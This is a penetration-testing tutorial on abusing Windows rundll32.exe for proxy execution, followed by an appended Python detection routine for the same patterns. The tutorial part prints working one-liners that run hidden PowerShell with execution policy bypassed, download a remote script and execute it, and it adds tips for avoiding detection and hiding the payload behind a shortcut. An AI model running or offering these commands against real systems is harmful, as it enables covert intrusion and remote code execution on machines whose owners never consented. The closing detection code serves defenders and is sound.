Rundll32

This program can be called to execute an arbitrary binary. This can be taken advantage of to avoid triggering security tools.

The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.

Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.

RunDll32 can also be used to execute scripts such as JavaScript. This can be done using crafted syntax. This behavior has been seen used by malware.

This is a great way to execute our C2 binaries in case we need to upgrade our standard shells to a C2 framework; this can be very helpful in post-exploitation.

Let's check some helpful commands.

Information about our machine:

rundll32 shell32.dll,ShellAbout

What about viewing our network connections?

rundll32 shell32.dll,Control_RunDLL ncpa.cpl

Calling a Shell

Let's call it remotely using JavaScript to execute a PS1 (PowerShell script) file.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

Let's make this better. I mean, our job is to go undetected, and that big blue PowerShell window is a major RED FLAG!! Let's hide it with [-w 1] (window style hidden).

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -w 1 -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

No blue window this time. Did it work?

Let's try to hide it further so it calls the shell remotely by setting up a (.LNK) shortcut that calls back to our payload. We will need to change a few names, like the IP and file name, and shorten them to a few characters, since the shortcut's name field can only take so many. We will right-click >> New >> Shortcut.

We will add the full path into the shortcut's properties, or into the URL path field.

And we can see below that our payload was successfully called and executed.

No output? No worries, that just tells us the code executed fine.

As you can see, rundll32 is a great way to execute files and also a way to get a foothold on the machine. I used basic tools like msfvenom to create the DLL payload, or a simple Nishang PowerShellTcp payload as the payload being called remotely, but of course there could be other ways: obfuscation can be added to avoid detection, and other files can be executed. They don't need to be what I used; I just demonstrated common payloads.
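As an added defender-side example that is not part of this write-up: a small Python triage routine over constructed Sysmon-style process-creation events that flags the rundll32 patterns discussed above (javascript:/RunHTMLApplication proxying, a .cpl launched through Control_RunDLL from outside the Windows system directories, a scripting host spawned by rundll32, and rundll32 with no arguments). The field names Image/ParentImage/CommandLine follow Sysmon Event ID 1; the events themselves are constructed, not real telemetry.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry); the
# first two mirror the benign commands above, the rest the proxy-execution cases.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32 shell32.dll,ShellAbout"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32 shell32.dll,Control_RunDLL ncpa.cpl"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'
                    'new%20ActiveXObject("WScript.Shell").Run("powershell -w 1 -nop -exec bypass ...")'},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\bob\AppData\Local\Temp\x.cpl"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "powershell -w 1 -nop -exec bypass -c IEX ..."},
]

SCRIPT_RE = re.compile(r"\b(javascript|vbscript):|RunHTMLApplication", re.I)  # script-proxy syntax
CPL_RE = re.compile(r'Control_RunDLL(AsUser)?\s+"?(?P<path>[^\s"]+\.cpl)', re.I)  # .cpl via shell32
CHILD_RE = re.compile(r"\\(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe$", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def is_rundll32(image):
    return image.lower().endswith(r"\rundll32.exe")

def classify(ev):
    """Return the list of detection reasons for one event (empty list = nothing flagged)."""
    reasons = []
    image, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]
    if is_rundll32(image):
        if SCRIPT_RE.search(cmd):
            reasons.append("script_proxy")
        m = CPL_RE.search(cmd)
        # A bare name like ncpa.cpl resolves through the search path and is not
        # flagged here; an explicit path outside the Windows system dirs is.
        if m and "\\" in m.group("path") and not m.group("path").lower().startswith(SYSTEM_DIRS):
            reasons.append("cpl_outside_system_dir")
        if len(cmd.split()) < 2:  # rundll32 launched with no DLL/entry point at all
            reasons.append("no_arguments")
    if is_rundll32(parent) and CHILD_RE.search(image):
        reasons.append("scripting_child_of_rundll32")
    return reasons

def triage(events):
    """Keep only the events that trip at least one rule, paired with their reasons."""
    return [(ev["CommandLine"], r) for ev in events if (r := classify(ev))]
```

The two benign commands from this page pass clean, while the javascript: invocation, the out-of-tree .cpl and the powershell child of rundll32 each surface with a named reason; tune SYSTEM_DIRS and CHILD_RE to the hosts you monitor.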
